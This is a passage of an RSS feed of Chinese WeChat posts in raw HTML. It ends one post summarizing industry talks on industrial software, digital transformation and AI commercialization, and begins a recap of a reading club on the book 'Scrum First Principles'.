&#34;微软雅黑 Light&#34;;" lang="zh-CN">顶级客户蝶变思维</span><span style="font-family:Calibri;" lang="en-US"> - </span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">达索</span><span style="font-family:Calibri;" lang="en-US">.</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">赵文功</span></h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">“顶级客户蝶变思维”强调客户在数字化转型中的关键作用，要求企业不仅要采用技术工具，还要</span><span style="font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: rgb(255, 0, 0);">深刻理解客户需求</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">，实现对业务的全面转型。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">达索的3D
     EXPERIENCE是一个全面的数字化转型平台，旨在为企业提供集成的、协同的创新体验，意味着</span><span style="font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: rgb(255, 0, 0);">将数字化转型思维融入企业DNA</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">，支持全球客户实现业务优化和转型，将数字化视为企业核心竞争力的驱动力。</span></p></li></ul><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-imgfileid="100000208" data-ratio="0.5755968169761273" width="502" data-type="png" data-w="754" height="289" src="https://wechat2rss.xlab.app/img-proxy/?k=1851c0a4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzbCraY826Zl4Bv7CdJQPPRBRbqZEOt9tvfmFQPLTlht5XFwomrKpTM5SmOLAqAs3XLWUD8SibibBQg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h2 style="margin:0in;font-size:14.0pt;color:#2E75B5;"><span style="font-family:
宋体;" lang="zh-CN">巨头的功能轰炸和国内的路径</span><span style="font-family:宋体;" lang="en-US"> - </span><span style="font-family:宋体;" lang="zh-CN">西门子</span><span style="font-family:Calibri;" lang="en-US">.</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">夏卫华</span></h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">成为真正的数字化企业，其中所有工作流程都经过集成和数字化，以充分利用数据，这使我们所有人都能从无限数据中创造无限机会。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">真正的数字化企业，能够利用数据的无限力量，获得有价值的见解，来做出快速而自信的觉察，并通过高效的生产创造一流的产品。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">整个演讲，感觉西门子是在进行地毯式、全方位的“</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:#FA0000;">功能轰炸</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;">”。国外巨头注重功能和产品，可以“功能轰炸“。国内企业强调“路径、情怀和理想”，在发展过程中更注重发展理念、价值观等软实力。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">在国内，创业往往从解决实际问题开始，先解决一个问题，然后逐步上硬件，最终在硬件趋同的情况下通过软件实现差异化。这种实际问题导向的创业模式在当前国内情境下是可行的。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">国内企业通过与国家的重大工程和事件绑定，可以在生态系统建设中获得更多支持。</span></p></li></ul><h2 style="margin:0in;font-size:14.0pt;color:#276296;"><span style="font-family:
&#34;微软雅黑 Light&#34;;" lang="zh-CN">新工艺带动设计方法的改变</span><span style="font-family:Calibri;" lang="en-US"> - </span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">西门子</span><span style="font-family:Calibri;" lang="en-US">.</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">陆云强</span></h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">增材制造则是在建立过程中逐层添加材料，因此有了更多的设计自由度，可设计更为复杂、轻量化的结构，以及更灵活的形状等。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">随着增材制造的出现，相应的设计方法也会发生改变，这是一种主流的工艺存在。</span></p></li></ul><h2 style="margin:0in;font-size:14.0pt;color:#2E75B5;"><span style="font-family:
&#34;微软雅黑 Light&#34;;" lang="zh-CN">数字化设计技术和四大科学发展范式</span><span style="font-family:Calibri;" lang="en-US"> - </span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">同元</span><span style="font-family:Calibri;" lang="en-US">.</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">陈立平</span></h2><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-imgfileid="100000211" data-ratio="0.5514636449480642" width="560" data-type="png" data-w="1059" height="309" src="https://wechat2rss.xlab.app/img-proxy/?k=252ed354&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzbCraY826Zl4Bv7CdJQPPRDnnWVWuE8shjqg9BJxATiaQYVHiajCn5gyrCPlLZ2krmOc9gURC199qw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h1 style="margin:0in;font-size:16.0pt;color:#1E4E79;"><span style="font-family:
&#34;Segoe UI Emoji&#34;;" lang="zh-CN">💎 </span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">主题</span><span style="font-family:Calibri;" lang="en-US">5</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">：</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">数字化价值实现</span><span style="font-family:Calibri;" lang="zh-CN"></span></h1><h2 style="margin:0in;font-size:14.0pt;color:#2E75B5;"><span style="font-family:
&#34;微软雅黑 Light&#34;;" lang="zh-CN">把握</span><span style="font-family:Calibri;" lang="en-US">AI</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">产业大周期有三个阶段</span><span style="font-family:Calibri;" lang="en-US"> - </span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">华泰</span><span style="font-family:Calibri;" lang="en-US">.</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">谢春生</span></h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="en-US">AI</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;" lang="zh-CN">需要经历产业预期、产业落地、业绩变现三个阶段</span></p></li></ul><ul type="disc" style="direction: ltr;unicode-bidi: embed;list-style: none;" class="list-paddingleft-1"><ul type="circle" style="direction: ltr;unicode-bidi: embed;margin-top: 0in;margin-bottom: 0in;list-style-type: square;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">产业预期阶段，实现从算法模型到产品的转化；</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">产业落地阶段，实现产品向商品的转化；</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">业绩兑现阶段，实现订单向净利润的转化。</span></p></li></ul></ul><h2 style="margin:0in;font-size:14.0pt;color:#2E75B5;"><span style="font-family:
&#34;微软雅黑 Light&#34;;" lang="zh-CN">知识变现的载体是从工具到产品再到平台和生态</span><span style="font-family:
Calibri;" lang="en-US"> - </span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">华泰</span><span style="font-family:Calibri;" lang="en-US">.</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">谢春生</span></h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">AI变现的载体，</span><span style="font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: rgb(255, 0, 0);">从工具到产品再到平台和生态</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">,随着层级的提高,实现商业化的难度越来越大。</span></p></li></ul><ul type="disc" style="direction: ltr;unicode-bidi: embed;list-style: none;" class="list-paddingleft-1"><ul type="circle" style="direction: ltr;unicode-bidi: embed;margin-top: 0in;margin-bottom: 0in;list-style-type: square;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">AI工具层面较为简单,通过将AI算法进行封装和产品化,赋能到具体场景中。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">AI产品层面需要解决整体系统集成和交付问题。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">AI平台需要吸引开发者生态的参与,提供基础能力。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">AI生态需要打通上下游,提供完整解决方案。</span></p></li></ul></ul><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-imgfileid="100000209" data-ratio="0.5487077534791253" width="604" data-type="png" data-w="1006" height="331" src="https://wechat2rss.xlab.app/img-proxy/?k=ca8e30c2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzbCraY826Zl4Bv7CdJQPPRyqtib1scSB9VPqicvk2gYYAuEjDWhZjadutqcgRkzMMbqaEFahACQSoQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h2 style="margin:0in;font-size:14.0pt;color:#2E75B5;"><span style="font-family:
&#34;微软雅黑 Light&#34;;" lang="zh-CN">高端起家，极致专业化四处渗透</span><span style="font-family:Calibri;" lang="en-US"> - </span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">达索</span><span style="font-family:Calibri;" lang="en-US">.</span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">赵文功</span></h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">行业护城河的建设需要</span><span style="font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;color: rgb(255, 0, 0);">极致专业化和服务</span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">达索的案例表明，高端起家并不意味着高利润，因为航空设计市场不大。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;">通过极致专业化，从高端航空到市场广阔的汽车行业的渗透，再到本土化运营，达索实现了在多个行业的广泛布局。</span></p></li></ul><h2 style="margin:0in;font-size:14.0pt;color:#2E75B5;"><span style="font-family:
&#34;Microsoft YaHei&#34;;" lang="zh-CN">工业软件的新型价值曲线</span><span style="font-family:Calibri;" lang="en-US"> - </span><span style="font-family:&#34;微软雅黑 Light&#34;;" lang="zh-CN">宝信</span><span style="font-family:Calibri;" lang="en-US">.</span><span style="font-family:&#34;Microsoft YaHei&#34;;" lang="zh-CN">丛力群</span></h2><ul class="list-paddingleft-1" style="list-style-type: disc;"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family: &#34;Microsoft YaHei&#34;;font-size: 12pt;color: rgb(255, 0, 0);">研发设计的高附加值</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:12.0pt;">在于知识密集的领域，如工业知识、架构、功能、工具化；</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family: &#34;Microsoft YaHei&#34;;font-size: 12pt;color: rgb(255, 0, 0);">销售服务的高附加值</span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:12.0pt;">是品牌价值的领域，如使用体验、便捷性、可靠性、服务化。</span></p></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><p><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:12.0pt;">编程作为一项技能，从工业软件的技术核心中逐步淡出，其技术价值会逐步降低。</span></p></li></ul><p style="margin-right: 0in;margin-left: 0in;"><img class="rich_pages wxw-img" data-imgfileid="100000212" data-ratio="0.5175718849840255" width="626" data-type="png" data-w="939" height="324" src="https://wechat2rss.xlab.app/img-proxy/?k=01e3d10d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzbCraY826Zl4Bv7CdJQPPRKBIXovRYtquDcEhzicra3Zh7ib4jdRxOYbleWvMs1CjLvZC80ViaW06VQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="margin-bottom: 0px;"><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247483862">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=4a80e7f7&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3NTc4NDAxMA%3D%3D%26mid%3D2247483862%26idx%3D1%26sn%3Dabc86fc485face4386c277b90a2f60a2%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sat, 20 Jan 2024 21:06:00 +0800</pubDate>
    </item>
    <item>
      <title>《SCRUM第一性原理》读书会（1）</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3NTc4NDAxMA==&amp;mid=2247483824&amp;idx=1&amp;sn=92bc66aaeb5e5206ab85635f9cbcbeab</link>
      <description>📚 喜欢一本书的方式，除了借、买、下载、发朋友圈，还可以加入读书会🚀</description>
      <content:encoded><![CDATA[<p>
<span>Alee</span> <span>2023-12-13 01:04</span> <span style="display: inline-block;">美国</span>
</p>

<p>📚 喜欢一本书的方式，除了借、买、下载、发朋友圈，还可以加入读书会🚀</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=c9cf3d98&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FFStUibflSINwPibicYO2EcApI6bzA2C77cHPPaWQSmicMIEficFucuQrvibcZHbaG5bRunkRXD8njKPBuQ7AGRAciczTg%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p><strong style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);visibility: visible;"><span style="outline: 0px;font-size: 20px;visibility: visible;">📚 喜欢一本书的方式，除了借、买、下载、发朋友圈，还可以加入读书会🚀</span></strong></p><p><strong style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);visibility: visible;"><span style="outline: 0px;font-size: 20px;visibility: visible;"><img class="rich_pages wxw-img" data-imgfileid="100000167" data-ratio="1.375" style="width: 242px;height: 333px;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=c8b619d8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINwPibicYO2EcApI6bzA2C77cHyRQZBCbFuH6FUmNZfM3wvRo7paicrWzuhDIWGD03sFUREX16sJXZThg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg%26wxfrom%3D5%26wx_lazy%3D1%26wx_co%3D1"/></span></strong></p><p style="border-width: 0px;border-style: solid;border-color: rgb(217, 217, 227);"><span style="font-size: 16px;">在技术社区做义工，我经历了许多有意义的时刻。这次是我第一次参加读书会，感受到了Zoom大会小会无缝切换的功能，让线上体验焕然一新。</span></p><p style="border-width: 0px;border-style: solid;border-color: rgb(217, 217, 227);"><span style="font-size: 16px;">Jeff Sutherland的个人传奇及其作品让我深感敬佩！这次读书会不仅有着社区大师的引领，每位参与者都闪耀着独特的思想光芒，这种碰撞与交流，让我深感收获匪浅。</span></p><p style="border-width: 0px;border-style: solid;border-color: rgb(217, 217, 227);"><span style="font-size: 16px;">接下来，我以一个英文字母为书友的缩写，来分享本次90分钟读书会的精华内容。</span></p><p style="border-width: 0px;border-style: solid;border-color: rgb(217, 217, 227);"><img class="rich_pages wxw-img" data-imgfileid="100000175" data-ratio="1.1079545454545454" style="height: 288px;font-family: &#34;Microsoft YaHei&#34;;font-size: 14.6667px;text-wrap: wrap;letter-spacing: 0.578px;width: 260px;" data-w="352" src="https://wechat2rss.xlab.app/img-proxy/?k=9bac85f8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINwPibicYO2EcApI6bzA2C77cHTaIWlicp40J2efdkDPAicJF3iaMbDrrJLicCkYPfH2YcnTBj7rNRlj0ENw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg%26wxfrom%3D5%26wx_lazy%3D1%26wx_co%3D1"/></p><p style="border-width: 0px;border-style: solid;border-color: rgb(217, 217, 227);"><strong style="color: rgba(0, 0, 0, 0.9);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: var(--articleFontsize);letter-spacing: 0.034em;text-align: justify;"><span style="font-size: 20px;">🌟 形式、效果和原则 🌟</span></strong><br/></p><p style="border-width: 0px;border-style: solid;border-color: rgb(217, 217, 227);"><strong>🔸 开场</strong></p><p style="border-width: 0px;border-style: solid;border-color: rgb(217, 217, 227);">S：<span style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);visibility: visible;">读书会目的是</span><span style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(250, 0, 0);visibility: visible;">快乐学习，要playful</span><span style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);visibility: visible;">，独行快，众行远。</span></p><p style="border-width: 0px;border-style: solid;border-color: rgb(217, 217, 227);"><strong>🔸 组织形式</strong></p><p style="border-width: 0px;border-style: solid;border-color: rgb(217, 217, 227);">S：<span style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);visibility: visible;">大会，分组讨论1， 大会讨论，分组讨论2，大会总结。</span></p><p style="border-width: 0px;border-style: solid;border-color: rgb(217, 217, 227);"><strong>🔸 本次效果</strong></p><p style="border-width: 0px;border-style: solid;border-color: rgb(217, 217, 227);">S最后总结：<span style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);visibility: visible;">读书会的</span><span style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(250, 0, 0);visibility: visible;">多元化带来了很多启发</span><span style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);visibility: visible;">，读书会上大家分享的想法，很多在我脑子里面从没有浮现过。</span></p><p style="border-width: 0px;border-style: solid;border-color: rgb(217, 217, 227);"><strong><span style="outline: 0px;background-color: rgb(255, 255, 255);visibility: visible;color: rgb(55, 65, 81);font-family: Söhne, ui-sans-serif, system-ui, -apple-system, &#34;Segoe UI&#34;, Roboto, Ubuntu, Cantarell, &#34;Noto Sans&#34;, sans-serif, &#34;Helvetica Neue&#34;, Arial, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Color Emoji&#34;;font-size: 16px;letter-spacing: normal;text-align: start;white-space: pre-wrap;">🔸 原则</span></strong></p><p style="border-width: 0px;border-style: solid;border-color: rgb(217, 217, 227);"><span style="outline: 0px;background-color: rgb(255, 255, 255);visibility: visible;color: rgb(55, 65, 81);font-family: Söhne, ui-sans-serif, system-ui, -apple-system, &#34;Segoe UI&#34;, Roboto, Ubuntu, Cantarell, &#34;Noto Sans&#34;, sans-serif, &#34;Helvetica Neue&#34;, Arial, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Color Emoji&#34;;font-size: 16px;letter-spacing: normal;text-align: start;white-space: pre-wrap;">L：<span style="outline: 0px;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;visibility: visible;">分组时每个人说</span><span style="outline: 0px;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: Calibri;visibility: visible;">3</span><span style="outline: 0px;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;visibility: visible;">-4分钟，大会时分享小组主要观点。</span><span style="outline: 0px;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;color: rgb(250, 0, 0);visibility: visible;">提供反馈时最重要的教练技能，就是先以事实开始</span><span style="outline: 0px;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;visibility: visible;">。</span></span></p><p style="border-width: 0px;border-style: solid;border-color: rgb(217, 217, 227);"><br/></p><p style="border-width: 0px;border-style: solid;border-color: rgb(217, 217, 227);"><strong style="font-size: var(--articleFontsize);letter-spacing: 0.034em;"><span style="font-size: 20px;">📖 致读者<strong style="letter-spacing: 0.578px;">与<strong style="letter-spacing: 0.578px;">前言</strong></strong> 📖</span></strong></p><p style="border-width: 0px;border-style: solid;border-color: rgb(217, 217, 227);"><strong>🔹 “绿野仙踪”的隐喻</strong>：相信每个人都是有创造力的天才！</p><p style="border-width: 0px;border-style: solid;border-color: rgb(217, 217, 227);"><span style="outline: 0px;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;">L：前言绿野仙踪的故事，是一个重要的隐喻。</span><span style="outline: 0px;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;color: rgb(250, 0, 0);">每个人都是本自具足的</span><span style="outline: 0px;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;">。教练第一课：</span><span style="outline: 0px;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;color: rgb(250, 0, 0);">相信每个人都是有创造力的天才！</span><span style="outline: 0px;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;">开始时不相信，在践行教练</span><span style="outline: 0px;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: Calibri;">/</span><span style="outline: 0px;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;">育儿过程中，更加相信教练原则的作用，每个人都会释放潜能。</span></p><p style="border-width: 0px;border-style: solid;border-color: rgb(217, 217, 227);"><strong>🔹 敏捷符合自然规律</strong>，是我们的自我特性</p><p style="border-width: 0px;border-style: solid;border-color: rgb(217, 217, 227);"><span style="outline: 0px;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;">S：敏捷符合宇宙</span><span style="outline: 0px;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: Calibri;">/</span><span style="outline: 0px;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;">自然规律，</span><span style="outline: 0px;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;color: rgb(250, 0, 0);">敏捷也是每个人的自我特性</span><span style="outline: 0px;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;">。</span></p><p style="border-width: 0px;border-style: solid;border-color: rgb(217, 217, 227);"><span style="outline: 0px;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;"><span style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);">L：原文很专业，也比较深奥，因为有很多物理内容和公式。马斯克让第一性原理火了起来，第一性原理说明各个领域都有一些固有甚至是类似的定律，</span><span style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(250, 0, 0);">第一性原理可以帮助我们明白到底是哪一部分在起作用</span><span style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);">。</span></span></p><p style="border-width: 0px;border-style: solid;border-color: rgb(217, 217, 227);"><strong>🔹 用类比解释Scrum</strong>，从物理定律到组织行为学的跨界解释</p><p style="border-width: 0px;border-style: solid;border-color: rgb(217, 217, 227);"><span style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;font-size: 14.6667px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);">S：这本书是用类比的方法解释Scrum。实践发现和现有理论从观测或形式上有一致性，可以相互类比、印证。例如，观察到两个同时发生的事实（物理定律、组织行为），可以用借喻的方法（用物理定律）来跨界解释社会学、组织行为学的现象。</span></p><p style="margin-right: 0in;margin-left: 0in;outline: 0px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;">F：瀑布转型到敏捷，就是从注重分工到注重配合。</p><p style="margin-right: 0in;margin-left: 0in;outline: 0px;font-family: system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-size: 11pt;"><span style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;">C：第一性原理，和演绎</span><span style="outline: 0px;font-family: Calibri;">/</span><span style="outline: 0px;font-family: &#34;Microsoft YaHei&#34;;">归纳有点类似。</span></p><p style="margin-right: 0in;margin-left: 0in;outline: 0px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;"><span style="outline: 0px;">L：有译者是武汉大学空间物理专业的，翻译相关物理章节内容，也是文字一个个扣，翻译过程中对SCRUM理解加深。</span></p><p style="margin-right: 0in;margin-left: 0in;outline: 0px;letter-spacing: 0.544px;text-wrap: wrap;background-color: rgb(255, 255, 255);font-family: &#34;Microsoft YaHei&#34;;font-size: 11pt;"><span style="outline: 0px;"><br/></span></p><p style="border-width: 0px;border-style: solid;border-color: rgb(217, 217, 227);"><strong><span style="font-size: 20px;">🌐 第一性原理是生成物理复杂性的简单规则 🌐</span></strong></p><p style="border-width: 0px;border-style: solid;border-color: rgb(217, 217, 227);"><strong>🔸 波粒二象性隐喻</strong>：个体像粒子，团队像波动，观察与自我觉察并行</p><p style="border-width: 0px;border-style: 